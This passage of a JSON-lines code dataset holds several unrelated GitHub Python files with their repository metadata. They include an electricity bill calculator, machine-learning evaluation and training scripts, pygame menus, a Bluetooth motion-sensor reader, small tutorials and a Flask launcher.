welcome back!\\n\")\n date, day, night = readings()\n dt = datetime.strptime(date, \"%d.%m.%Y\")\n\n days, day_reading, night_reading = get_parameters(reading, dt, day, night)\n total = fare(day_reading, night_reading, days)\n vat = round((total * 0.05),2) \n\n print(\"\\nOkay, so...\\nYour bill is $%s\\nYour expenses were %s \\nand your VAT was %s \\nAnd that's it =] \" % ((total + vat), total, vat))\n\n data = [[date,day,night]] #This block appends the info to the csv file, so you will always save your readings and you might use it for a different kind of analysis in the future\n save = pd.DataFrame(data=data, columns=['Date','Day','Night'])\n save_df = electricity.append(save)\n save_df.to_csv(\"electricity.csv\", index=False)\n","repo_name":"daiara/electricity","sub_path":"electricity.py","file_name":"electricity.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14351845225","text":"import torch \nimport matplotlib.pyplot as plt \nimport matplotlib.ticker as ticker\nimport seaborn as sns\nimport pandas as pd\n\nfrom model import Seq2SeqEncoder, AttSeq2SeqDecoder \nfrom torch_data import DATALOADER\nfrom torch_data import en as EN\nfrom torch_data import sp as SP\n \ndef evaluate(encoder, decoder, filename):\n\n MAX_LEN = 11\n inputs, outputs = iter(DATALOADER).next()\n \n k = 1\n plt.figure(figsize=(12, 6))\n plt.suptitle('Attention weights')\n \n \n for x, y in zip(inputs, outputs):\n x += ' '\n y += ' '\n ins = torch.tensor(SP.sentence2ids(x), dtype=torch.long)\n enc_out, h, c = encoder.evaluate(ins)\n enc_out = torch.cat([enc_out, torch.zeros(MAX_LEN - enc_out.size(0), 256)])\n \n attn_weights = []\n pred = [] \n inputw = 0\n for w in EN.sentence2ids(y):\n out, h, c, attn_w = decoder.evaluate(torch.tensor([inputw], dtype=torch.long), h, c, enc_out)\n attn_weights.append(attn_w[:, :ins.size(0)].view(1, -1).detach())\n inputw = torch.argmax(out, dim=1).detach().item()\n pred.append(EN.id2word[inputw])\n \n \n \n attn_weights = torch.cat(attn_weights, dim=0).detach().numpy()\n \n df = pd.DataFrame(columns=x.split(' '), data=attn_weights)\n df[''] = pred\n df = df.set_index('', drop=True)\n \n plt.subplot(2, 2, k)\n sns.heatmap(df, cmap='bone', vmax=1, vmin=0)\n plt.yticks(rotation=0)\n plt.xticks(rotation=90)\n\n \n \n \n k += 1\n if k == 5: break\n \n plt.tight_layout() \n plt.savefig(filename)\n \n \n \n \n \n \ndef load_model(encoder, decoder):\n try:\n data = torch.load(f'models/AttSeq2Seq.pth')\n encoder.load_state_dict(data['encoder'])\n decoder.load_state_dict(data['decoder'])\n encoder.eval()\n decoder.eval()\n print('loaded')\n print(data['epoch'])\n except:\n pass \n \n \nif __name__ == '__main__':\n encoder = Seq2SeqEncoder()\n decoder = AttSeq2SeqDecoder()\n load_model(encoder, decoder)\n evaluate(encoder, decoder, 'imgs/ev.png')\n \n ","repo_name":"ManuelAlejandroMartinezFlores/PYTORCH_projects","sub_path":"AttSeq2Seq-translator/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35663722693","text":"import os\nimport glob\nimport pandas as pd\nimport numpy as np\nimport argparse\n\ndef all_score(TP1,TP2,N1,N2,recall_all):\n\n if (N1 ==0 and N2==0) or (TP1==0 and TP2 ==0):\n precision_all =0\n F1_SCORE = 0\n else:\n precision_all = 1.0* (TP1+TP2)/(N1+N2)\n F1_SCORE = 2*(recall_all*precision_all)/(recall_all+precision_all)\n return F1_SCORE,precision_all\n \ndef main_threshold(path, dataset, annotation, version, label_frequency, start_threshold, max_num_pos, base_duration):\n print(path)\n files_tmp = os.listdir(path)\n files = sorted(files_tmp, key = lambda x:int(x[-2:]))\n ann_csv = pd.read_csv(annotation)\n test_path_temp = [os.path.join(path, i, 'test_detection') for i in files]\n txts = glob.glob(os.path.join(test_path_temp[0], '*.txt'))\n\n txts = [int(i.split('_')[-1].split('.')[0]) for i in txts]\n txts.sort()\n\n best_ME_1, best_ME_2 = 0, 0\n best, best_m1, best_m2 = 0.10, 0.15, 0.01\n best_recall = 0\n if dataset =='cas(me)^2':\n out_path_tmp = os.path.join(os.path.dirname(annotation), 'threshold', 'cathreshold'+'_'+str(version))\n elif dataset =='cas(me)^3':\n out_path_tmp = os.path.join(os.path.dirname(annotation), 'threshold', 'ca3threshold'+'_'+str(version))\n else:\n out_path_tmp = os.path.join(os.path.dirname(annotation), 'threshold', 'sathreshold'+'_'+str(version))\n if not os.path.exists(out_path_tmp):\n os.makedirs(out_path_tmp)\n best_out = os.path.join(out_path_tmp, os.path.basename(path)+'_best_sample.log')\n threshold_out = os.path.join(out_path_tmp, os.path.basename(path)+'_'+path[-2:]+'_threshlod.log')\n if os.path.exists(threshold_out):\n os.remove(threshold_out)\n tp_sub = dict()\n for e in range(5, 120):\n txt_index = txts[e]\n # all subjects in the same epoch\n test_path = [os.path.join(i, 'test_'+str(txt_index).zfill(2)+'.txt') for i in test_path_temp] \n # confirm the best threshold\n for k_temp in range(start_threshold, 500, 1):\n k = 1.0 *k_temp/1000 \n TP1, TP2 = 0, 0\n N1, N2, N_all, N2_ME = 0, 0, 0, 0\n length_count = list()\n write_list = list()\n length_pre = list()\n # every subject in one file (200x)\n for ip in test_path:\n T = 0\n with open(ip, 'r') as f:\n all_lines = f.readlines()\n if not all_lines:\n continue\n all_lines = [h.split('\\t') for h in all_lines]\n # divide all gts of every video\n tmp_video = all_lines[0][0]\n count = 1\n tmp_list = list()\n all_test = dict()\n all_video = list(set([name[0] for name in all_lines]))\n for tv in all_video:\n tmp_video = tv\n for j in range(len(all_lines)):\n if all_lines[j][0] == tmp_video:\n tmp_list.append(all_lines[j])\n all_test[count] = tmp_list\n count = count + 1\n tmp_list = list()\n # number of GT of every video\n num_of_video = len(all_test.keys()) \n # least len of GT\n part_tmp = list()\n # select predictions of every video (prob > threshold)\n for i in range(num_of_video):\n tmp_one_video = list(all_test.values())[i]\n part = [o for o in tmp_one_video if float(o[-1][:-2]) > k ]\n # N1: number of precictions of macro-expressions\n # N2: number of precictions of micro-expressions\n # N_all: number of precictions\n if len(part) > max_num_pos :\n part = part[:max_num_pos]\n N_all = N_all + len(part)\n N1 = N1 + len([o for o in part if np.array(o[2]).astype(float).astype(np.int64) * int(label_frequency)-np.array(o[1]).astype(float).astype(np.int64) * int(label_frequency) > base_duration])\n N2 = N2 + len([o for o in part if np.array(o[2]).astype(float).astype(np.int64) * int(label_frequency)-np.array(o[1]).astype(float).astype(np.int64) * int(label_frequency) <= base_duration])\n N2_ME = N2_ME + len([o for o in part if np.array(o[2]).astype(float).astype(np.int64) * int(label_frequency)-np.array(o[1]).astype(float).astype(np.int64) * int(label_frequency) <= 2 *base_duration])\n if not part:\n part = [[tmp_one_video[0][0], '100000', '100000', '_','_']]\n part_tmp.append(part) \n part_pre = part_tmp\n\n # predictions: sorted by prob\n part_pre= [sorted(i, key = lambda x:int(float(x[1]))) for i in part_pre]\n \n # calculate iou between every prediction with GT\n for video_num, pre in enumerate(part_pre):\n video_name_list = list(set(ann_csv.video.values[:].tolist()))\n video_name_list.sort()\n \n # identify the current video\n video_name_last = part_pre[video_num][0][0]\n if dataset =='cas(me)^2':\n video_name_part = 's' + video_name_last[:2]\n video_name = os.path.join(video_name_list[0].split('/s')[0], video_name_part, video_name_last)\n elif dataset == 'samm_merge':\n video_name = os.path.join(video_name_list[0][:-4],str(video_name_last).zfill(3))\n elif dataset == 'cas(me)^3':\n video_name = os.path.join(video_name_list[0][:-6], str(video_name_last.split('_')[0]).zfill(3), str(video_name_last.split('_')[1]))\n else:\n video_name = os.path.join(video_name_list[0][:-6],str(video_name_last).zfill(3))\n # select startframes of current video\n video_ann_df = ann_csv[ann_csv.video == video_name]\n act_start_video = video_ann_df['startFrame'].values[:]\n # select indexes of startframes of current video\n indexes = np.argsort(act_start_video)\n # labels and endframes are sorted by indexes from actual start frames\n act_end_video = video_ann_df['endFrame'].values[:]\n act_end_video = np.array(act_end_video)[indexes]\n # labels = video_ann_df['type_idx'].values[:]\n # labels = np.array(labels)[indexes]\n # actual start frames are sorted by time series\n act_start_video.sort()\n \n pre = np.array(pre)\n pre_start = pre[:,1].astype(float).astype(np.int64) * int(label_frequency)\n pre_end = pre[:,2].astype(float).astype(np.int64) * int(label_frequency)\n \n start_tmp = list()\n end_tmp = list()\n for m in range(len(act_start_video)):\n video_label = video_name_last[:7]\n act_start = int(act_start_video[m])\n act_end = int(act_end_video[m])\n iou = (np.minimum(pre_end, act_end) - np.maximum(pre_start, act_start)+1)/(np.maximum(pre_end, act_end) - np.minimum(pre_start, act_start)+1)\n max_iou = np.max(iou)\n max_index = np.argmax(iou)\n if max_iou >= 0.5:\n tmp_write_list = [video_label, pre_start[max_index], pre_end[max_index], act_start, act_end, 'TP']\n write_list.append(tmp_write_list) \n length_count.append(act_end-act_start)\n length_pre.append(pre_end[max_index]-pre_start[max_index])\n if act_end - act_start > base_duration:\n TP1 = TP1 + 1\n elif 0 < act_end - act_start <= base_duration:\n TP2 = TP2 + 1\n start_tmp.append(pre_start[max_index])\n end_tmp.append(pre_end[max_index])\n T = T + 1\n else:\n tmp_write_list = [video_label, '_', '_', act_start, act_end, 'FP']\n write_list.append(tmp_write_list) \n pre_start_remain = list(pre_start)\n pre_end_remain = list(pre_end)\n pre_remain_s = [i for i in pre_start_remain if i not in start_tmp] \n pre_remain_e = [i for i in pre_end_remain if i not in end_tmp] \n try:\n if pre_remain_s[0] < 100000 and len(pre_remain_s) == len(pre_remain_e):\n write_remain = [[video_label, i, pre_end[pre_start==i][0], '_', '_', 'FN'] for i in pre_remain_s]\n write_list = write_list + write_remain\n elif pre_remain_s[0] == 100000:\n pass\n else:\n write_remain = [[video_label, pre_start[pre_end==i][0], i, '_', '_', 'FN'] for i in pre_remain_e]\n write_list = write_list + write_remain\n except:\n pass\n num_index = ip.find('subject') \n sub_num = ip[num_index+9:num_index+11]\n tp_key = str(e)+'_'+ sub_num\n try:\n tp_sub[tp_key] \n except:\n tp_sub[tp_key] = 0 \n if T > tp_sub[tp_key]:\n tp_sub[tp_key] = T \n # calculate F1_score\n # M_all need to calculate in SAMM\n # M1: Number of macro-expressions\n # M2: Number of micro-expressions\n if dataset == 'cas(me)^2' or dataset == 'cas(me)^2_merge':\n M1 = 300\n M2 = 57\n elif dataset == 'cas(me)^3':\n M1 = 2071\n M2 = 277\n else:\n # M1 = 340\n # M2 = 159\n M1 = 312\n M2 = 159\n recall1 = 1.0* TP1/M1\n recall2 = 1.0* TP2/M2\n recall_all = 1.0 *(TP1+TP2)/(M1+M2)\n if recall_all > best_recall:\n best_recall = recall_all\n print('best', recall_all)\n # Sometimes, there are no predictions of micro-expressions or macro-expressions\n F1_SCORE, precision_all = all_score(TP1,TP2,N1,N2,recall_all)\n if recall1 > best_m1:\n best_m1 = recall1\n print(\"recall_macro: %05f, recall_micro: %05f, %f\"%(best_m1, best_m2, k))\n if recall2 > best_m2:\n best_m2 = recall2\n print(\"recall_macro: %05f, recall_micro: %05f, %f\"%(best_m1, best_m2, k))\n # record best the F1_scroe and the result of predictions\n if F1_SCORE > best:\n best = F1_SCORE\n # print('number of epoch: %d, threshold: %5f'%(e, k))\n print(\"recall: %05f, precision: %05f, f1_score: %05f\"%(recall_all, precision_all, best))\n with open(best_out, 'w') as f_sout:\n f_sout.writelines(\"%s, %s, %s, %s, %s, %s\\n\" % (wtmp[0], wtmp[1],wtmp[2],wtmp[3],wtmp[4],wtmp[5]) for wtmp in write_list)\n with open(threshold_out, 'a') as f_threshold:\n f_threshold.writelines(\"%d, %f, %d, %d, %d, %d, f1: %05f, recall: %05f, precision: %05f, f1_score_macro: %05f, f1_score_micro: %05f\\n\" \n % (e, k, TP1, TP2, N1, N2, F1_SCORE, recall_all, precision_all, best_m1, best_m2))\n if best > 0.38:\n standard_out = os.path.join(out_path_tmp, os.path.basename(path)+'_'+str(e)+'_'+str(k)+'_'+str(F1_SCORE)+'.log')\n with open(standard_out, 'w') as f_sout:\n f_sout.writelines(\"%s, %s, %s, %s, %s, %s\\n\" % (wtmp[0], wtmp[1],wtmp[2],wtmp[3],wtmp[4],wtmp[5]) for wtmp in write_list)\n length_count.sort()\n length_pre.sort()\n print('pre:', length_pre,'\\n','act:', length_count,'\\n',TP1, TP2, N1, N2, k) \n \n F1_SCORE_ME_1 = 2.0*(TP2/N2 * TP2/M2)/(TP2/N2 + TP2/M2) if TP2!=0 and N2!=0 else 0\n F1_SCORE_ME_2 = 2.0*(TP2/N2_ME * TP2/M2)/(TP2/N2_ME + TP2/M2) if TP2!=0 and N2_ME!=0 else 0\n if F1_SCORE_ME_1 > best_ME_1:\n print('ME1',F1_SCORE_ME_1)\n best_ME_1 = F1_SCORE_ME_1\n if F1_SCORE_ME_2 > best_ME_2:\n print('ME2',F1_SCORE_ME_2)\n best_ME_2 = F1_SCORE_ME_2\n print(\"epoch: !!!!!!!!!!!!!!!!!!!!!!!!\", e+1) \n print(tp_sub)\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Test')\n\n # parser.add_argument('--path', type=str, default='/home/yww/LGSNET/LGSNet/output/cas(me)^2_new')\n # parser.add_argument('--ann', type=str, default='/home/yww/LGSNET/LGSNet/casme2_annotation.csv')\n # parser.add_argument('--dataset', type=str, default='cas(me)^2')\n # # parser.add_argument('--ann', type=str, default=r'/home/yww/LGSNET/LGSNet/casme2_annotation_357.csv')\n # # parser.add_argument('--dataset', type=str, default=r'cas(me)^2_merge')\n # parser.add_argument('--version', type=int, default=28)\n # parser.add_argument('--top_k', type=bool, default=False)\n # parser.add_argument('--label_frequency', type=float, default=1.0)\n # parser.add_argument('--start_threshold', type=int, default=300)\n # parser.add_argument('--most_pos_num', type=int, default=14)\n # parser.add_argument('--base_duration', type=int, default=15)\n\n # parser.add_argument('--path', type=str, default='/home/yww/LGSNET/LGSNet/output/samm')\n # parser.add_argument('--ann', type=str, default='/home/yww/LGSNET/LGSNet/samm_annotation_merge_part_2000_L800_new2.csv')\n # parser.add_argument('--dataset', type=str, default='samm')\n # parser.add_argument('--version', type=int, default=28)\n # parser.add_argument('--top_k', type=bool, default=False)\n # parser.add_argument('--label_frequency', type=float, default=1.0)\n # parser.add_argument('--start_threshold', type=int, default=100)\n # parser.add_argument('--most_pos_num', type=int, default=14)\n # parser.add_argument('--base_duration', type=int, default=15)\n\n parser.add_argument('--path', type=str, default='/home/yww/LGSNET/LGSNet/output/cas(me)^3')\n parser.add_argument('--ann', type=str, default='/home/yww/LGSNET/LGSNet/cas3_annotation_full_me_reduce.csv')\n parser.add_argument('--dataset', type=str, default='cas(me)^3')\n parser.add_argument('--version', type=int, default=28)\n parser.add_argument('--top_k', type=bool, default=False)\n parser.add_argument('--label_frequency', type=float, default=1.0)\n parser.add_argument('--start_threshold', type=int, default=300)\n parser.add_argument('--most_pos_num', type=int, default=14)\n parser.add_argument('--base_duration', type=int, default=15)\n\n args = parser.parse_args()\n path = args.path\n dataset = args.dataset\n ann = args.ann\n version = args.version\n top_k = args.top_k\n label_frequency = args.label_frequency\n start_threshold = args.start_threshold\n max_num_pos = args.most_pos_num\n base_duration = args.base_duration\n \n main_threshold(path, dataset, ann, version, label_frequency, start_threshold, max_num_pos, base_duration)","repo_name":"williamlee91/LGSNet","sub_path":"LGSNet/tools/F1_score_last.py","file_name":"F1_score_last.py","file_ext":"py","file_size_in_byte":15814,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"19586746710","text":"# this file contains the menu navigation loop code\nimport pygame, random\nfrom config import *\nfrom assets import *\nfrom classes import *\n\nlast_pause_time = pygame.time.get_ticks()\n\n\nclass start_menu():\n def __init__(self):\n self.last__loop = 0\n\n\n def run(self, screen, loop_history):\n # list of arguments to feed back to controller\n feedback = []\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n feedback.append(\"exit\")\n if event.type == pygame.KEYDOWN:\n feedback.append(\"switch:game\")\n\n screen.blit(scaled_background, [0,0])\n draw_text(screen, \"SHMUP!\", (200,200,200), 60, [ssize[0]//2, ssize[1]//4] )\n draw_text(screen, \"press any key to start\", (200,200,200), 24, [ssize[0]//2, ssize[1]//2])\n pygame.display.flip()\n\n return feedback\n\n\n\n# pause menu\nclass pause_menu():\n def __init__(self):\n self.last_loop = 0\n self.game_image = scaled_background\n\n center = [i//2 for i in ssize]\n self.resume_rect = pygame.rect.Rect([center[0]-100, center[1]-70, 200, 40])\n self.exit_rect = pygame.rect.Rect([center[0]-100, center[1]-20, 200, 40])\n\n\n def run(self, screen, loop_history):\n # list of arguments to feed back to controller\n feedback = []\n\n #run when switching to this one\n if pygame.time.get_ticks() - self.last_loop > 50:\n self.game_image = screen\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n feedback.append(\"exit\")\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n feedback.append(\"switch:game\")\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = pygame.mouse.get_pos()\n\n if self.resume_rect.collidepoint(mouse_pos):\n feedback.append(\"switch:game\")\n\n if self.exit_rect.collidepoint(mouse_pos):\n feedback.append(\"switch:start\")\n\n\n screen.blit(self.game_image, [0,0])\n draw_text(screen, \"PAUSED\", (200,200,200), 60, [ssize[0]//2, ssize[1]//4])\n #resume button\n pygame.draw.rect(screen, (20,20,150), self.resume_rect)\n pygame.draw.rect(screen, (200,200,200), self.resume_rect, 2)\n draw_text(screen, \"Resume\", (150,150,150), 24, self.resume_rect.center)\n #exit button\n pygame.draw.rect(screen, (20,20,150), self.exit_rect)\n pygame.draw.rect(screen, (200,200,200), self.exit_rect, 2)\n draw_text(screen, \"Exit\", (150,150,150), 24, self.exit_rect.center)\n\n pygame.display.flip()\n\n self.last_loop = pygame.time.get_ticks()\n\n return feedback\n","repo_name":"Scaniox/school","sub_path":"pygame/shmup/menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24736208326","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: kipp\n@contact: kaidma.kipp@gmail.com\n@site: \n@software: PyCharm\n@file: aae.py\n@time: 2019/9/10 下午6:59\n# Shallow men believe in luck.\nStrong men believe in cause and effect.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport torch\nimport torchvision\nimport itertools\nfrom net.aae import *\nfrom dataset.mnist import Mnist\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = (18.0, 12.0)\n\nclass AAE_Net(object):\n def __init__(self, latent_dim, img_shape,lr,b1,b2):\n self.latent_dim = latent_dim\n self.img_shape = img_shape\n\n self.adversarial_loss = nn.BCELoss()\n self.pixewise_loss = nn.L1Loss()\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n self.encoder = Encoder(self.latent_dim, self.img_shape).to(self.device)\n self.decoder = Decoder(self.latent_dim, self.img_shape).to(self.device)\n self.discriminator = Discriminator(self.latent_dim).to(self.device)\n\n self.optimizer_G = torch.optim.Adam(\n itertools.chain(self.encoder.parameters(),self.decoder.parameters()),lr=lr,betas=(b1,b2))\n self.optimizer_D = torch.optim.Adam(self.discriminator.parameters(),lr=lr,betas=(b1,b2))\n\n data = Mnist()\n self.dataloader = data.get_loader(True, 512, 28)\n\n def sample_images(self, n_row):\n z = torch.from_numpy(np.random.normal(0,1,(n_row**2,self.latent_dim))).type(torch.cuda.FloatTensor)\n z = z.to(self.device)\n gen_imgs = self.decoder(z)\n dis_imgs = gen_imgs.view(n_row ** 2, *(28, 28))\n dis_imgs = dis_imgs.to(\"cpu\")\n dis_imgs = dis_imgs.detach().numpy()\n for k, dis_img in enumerate(dis_imgs):\n plt.subplot(n_row, n_row, k + 1)\n plt.imshow(dis_imgs[k])\n plt.pause(1)\n\n def Train(self, epochs):\n for epoch in range(epochs):\n for i, (imgs, labels) in enumerate(self.dataloader):\n valid = torch.ones((imgs.size(0), 1)).to(self.device)\n fake = torch.zeros((imgs.size(0), 1)).to(self.device)\n real_imgs = imgs.to(self.device)\n # -----------------\n # Train Generator\n # -----------------\n self.optimizer_G.zero_grad()\n encoded_imgs = self.encoder(real_imgs)\n decoded_imgs = self.decoder(encoded_imgs)\n coder_loss = 0.001*self.adversarial_loss(self.discriminator(encoded_imgs), valid)\n g_loss = coder_loss+ 0.999*self.pixewise_loss(decoded_imgs, real_imgs)\n g_loss.backward()\n self.optimizer_G.step()\n\n # ---------------------\n # Train Discriminator\n # ---------------------\n self.optimizer_D.zero_grad()\n z = torch.from_numpy(np.random.normal(0,1,(imgs.shape[0], self.latent_dim)))\n z = z.to(self.device).type(torch.cuda.FloatTensor)\n real_loss = self.adversarial_loss(self.discriminator(z),valid)\n fake_loss = self.adversarial_loss(self.discriminator(encoded_imgs.detach()),fake)\n d_loss = 0.5*(real_loss+fake_loss)\n\n d_loss.backward()\n self.optimizer_D.step()\n if(i + 1) % (len(self.dataloader) // 2) == 0:\n print(\n \"[Epoch %3d/%3d] [Batch %3d/%3d] [real loss: %.4f] [fake loss %.4f] [G loss %.4f]\"\n % (epoch, epochs, i, len(self.dataloader), real_loss.item(), fake_loss.item(), g_loss.item())\n )\n self.sample_images(10)\n\n\ndef main(epochs=250,latent_dim=100, image_shape=(1,28,28), lr=0.0005, b1=0.5, b2=0.999):\n aae = AAE_Net(latent_dim, image_shape,lr,b1,b2)\n aae.Train(epochs)\n\nif __name__ == \"__main__\":\n import fire\n\n fire.Fire(main)","repo_name":"kadimakipp/GAN","sub_path":"alchemy/aae.py","file_name":"aae.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39199299903","text":"import asyncio\nimport time\nfrom bleak import BleakClient, BleakScanner\n\n\nfrom func.general_operations import decoded_data, di_commands, di_hz\n\n\n\"\"\"Методы для обработки Bluetooth\"\"\"\n\n# UUID для считывания (Одинаковы для WT901BLE)\nnotify_uuid = \"0000ffe4-0000-1000-8000-00805f9a34fb\"\ndef write_uuid_func():\n write_uuid = \"0000ffe9-0000-1000-8000-00805f9a34fb\" # UUID для записи\n return write_uuid\n\n# Поиск ближайших датчиков\nasync def run():\n devices = await BleakScanner.discover(timeout=1)\n d = [dev.address for dev in devices if 'WT901' in dev.name]\n return d\n\n\n# Калибровка гироскопа и акселерометра для Bluetooth 5.0\nasync def ble_calibrate_gyr_and_acc(client: BleakClient):\n await client.write_gatt_char(\n write_uuid_func(),\n di_commands('accelerometer_calibration'))\n await asyncio.sleep(4)\n await client.write_gatt_char(\n write_uuid_func(),\n di_commands('exit_calibration_mode'))\n\n\n# Переключение Algorithm Transition для Bluetooth 5.0 \nasync def ble_algorithm_transition(client: BleakClient, axis):\n await client.write_gatt_char(\n write_uuid_func(), \n di_commands(axis))\n await client.write_gatt_char(\n write_uuid_func(),\n di_commands('save_configuration'))\n\n\n# Изменение частоты обновления данных для Bluetooth 5.0\nasync def ble_return_rate(client: BleakClient, rate):\n await client.write_gatt_char(\n write_uuid_func(), \n di_hz(rate))\n await client.write_gatt_char(\n write_uuid_func(),\n di_commands('save_configuration'))\n \n\n# Класс для принятия и обработки данных\nclass Bluetooth():\n current_data = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n\n def __init__(self, rate):\n self.rate = rate\n\n # Для того, чтобы вытащить данные из start_notify\n def data(self):\n return self.current_data\n\n def _notification_handler(self, sender, data: bytearray):\n header_bit = data[0]\n assert header_bit == 0x55\n flag_bit = data[1] # 0x51 or 0x71\n assert flag_bit == 0x61 or flag_bit == 0x71\n self.current_data = decoded_data(data)\n\n async def bluetooth_run_async(self, client):\n await client.start_notify(notify_uuid, self._notification_handler)\n a, w, A = self.current_data[0], self.current_data[1], self.current_data[2]\n\n # Иначе шлёт данные по websocket каждые 0.01 сек\n time.sleep(1/self.rate)\n\n return a, w, A\n","repo_name":"LiDline/witmotion_WT901BLECL_py","sub_path":"func/for_bluetooth.py","file_name":"for_bluetooth.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8648203247","text":"# signal_getsignal.py\n\nimport signal\n\n\ndef alarm_received(n, stack):\n return\n\n\nsignal.signal(signal.SIGALRM, alarm_received)\n\nsignals_to_names = {\n getattr(signal, n): n\n for n in dir(signal)\n if n.startswith('SIG') and '_' not in n\n}\n\nfor s, name in sorted(signals_to_names.items()):\n handler = signal.getsignal(s)\n if handler is signal.SIG_DFL:\n handler = 'SIG_DFL'\n elif handler is signal.SIG_IGN:\n handler = 'SIG_IGN'\n print('{:<10} ({:2d}):'.format(name, s), handler)\n\n# $ python3 signal_getsignal.py\n#\n# SIGHUP ( 1): SIG_DFL\n# SIGINT ( 2): \n# SIGQUIT ( 3): SIG_DFL\n# SIGILL ( 4): SIG_DFL\n# SIGTRAP ( 5): SIG_DFL\n# SIGIOT ( 6): SIG_DFL\n# SIGEMT ( 7): SIG_DFL\n# SIGFPE ( 8): SIG_DFL\n# SIGKILL ( 9): None\n# SIGBUS (10): SIG_DFL\n# SIGSEGV (11): SIG_DFL\n# SIGSYS (12): SIG_DFL\n# SIGPIPE (13): SIG_IGN\n# SIGALRM (14): \n# SIGTERM (15): SIG_DFL\n# SIGURG (16): SIG_DFL\n# SIGSTOP (17): None\n# SIGTSTP (18): SIG_DFL\n# SIGCONT (19): SIG_DFL\n# SIGCHLD (20): SIG_DFL\n# SIGTTIN (21): SIG_DFL\n# SIGTTOU (22): SIG_DFL\n# SIGIO (23): SIG_DFL\n# SIGXCPU (24): SIG_DFL\n# SIGXFSZ (25): SIG_IGN\n# SIGVTALRM (26): SIG_DFL\n# SIGPROF (27): SIG_DFL\n# SIGWINCH (28): SIG_DFL\n# SIGINFO (29): SIG_DFL\n# SIGUSR1 (30): SIG_DFL\n# SIGUSR2 (31): SIG_DFL\n","repo_name":"syurskyi/Python_Topics","sub_path":"110_concurrency_parallelism/001_asynchronous/examples/signal — Asynchronous System Events/002_Retrieving Registered Handlers.py","file_name":"002_Retrieving Registered Handlers.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"3325247570","text":"# while and for loops\n\n# x = 0\n# while (x < 5):\n# print(x)\n# x = x + 1\n\n# for loop\n\n# for x in range(5, 10):\n# print(x)\n\n# Array\n\ndays = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"]\n\nfor d in days:\n # if d == \"Friday\":\n # break # loop break/stop\n if d == \"Friday\":\n continue # skip this value\n print(d)\n","repo_name":"abid-2362/python-ka-chilla","sub_path":"11_loops.py","file_name":"11_loops.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16285376955","text":"import collections\n\ndef _write_complex_object(defaults, values):\n output = collections.OrderedDict()\n for key in defaults.keys():\n default = defaults[key]\n if key in values:\n value = values[key]\n if value == None:\n value = default\n elif default:\n value = default\n else:\n continue\n\n if isinstance(value, list):\n value_copy = []\n for item in value:\n if hasattr(item, 'write') and callable(getattr(item, 'write')):\n value_copy.append(item.write())\n else:\n value_copy.append(item)\n if len(value_copy) > 0:\n output[key] = value_copy\n elif isinstance(value, dict):\n value_copy = collections.OrderedDict()\n keys = sorted(value.keys())\n for item_key in keys:\n item_value = value[item_key]\n if hasattr(item_value, 'write') and callable(getattr(item_value, 'write')):\n value_copy[item_key] = item_value.write()\n else:\n value_copy[item_key] = item_value\n if len(value_copy) > 0:\n output[key] = value_copy\n elif hasattr(value, 'write') and callable(getattr(value, 'write')):\n value_copy = value.write()\n if len(value_copy) > 0:\n output[key] = value_copy\n else:\n value_copy = value\n output[key] = value_copy \n\n return output","repo_name":"EnjoyLifeFund/macHighSierra-cellars","sub_path":"azure-cli/2.0.18/libexec/lib/python3.6/site-packages/applicationinsights/channel/contracts/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"8934486593","text":"from flask import Flask\nfrom optparse import OptionParser\n\nimport api\nfrom app import config\n\n\ndef create_app():\n app = Flask(__name__, static_folder='static')\n app.register_blueprint(\n api.bp,\n url_prefix='')\n app.config['SECRET_KEY'] = config.SECRET_KEY\n\n return app\n\n\ndef new_app(*args, **kwargs):\n my_app = create_app()\n\n return my_app(*args, **kwargs)\n\n\nif __name__ == '__main__':\n parser = OptionParser()\n parser.add_option(\"-p\", \"--port\", dest=\"port\",\n help=\"Flask port\", metavar=\"\", default=8080)\n\n (options, args) = parser.parse_args()\n\n option_dict = vars(options)\n port = int(option_dict['port'])\n\n app = create_app()\n app.run(debug=True, port=port, host='0.0.0.0', threaded=True)\n","repo_name":"maurapintor/pandavision","sub_path":"app/runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"72590079524","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\nimport json\nimport datetime\nimport requests\nimport urllib.parse\n\nimport KalinaData\n\n\nclass Global:\n\n plug_path = '/qqbot/'\n\n database_path = '/qqbot/normal_data/'\n database_up_path = '/qqbot/up_data/'\n\n 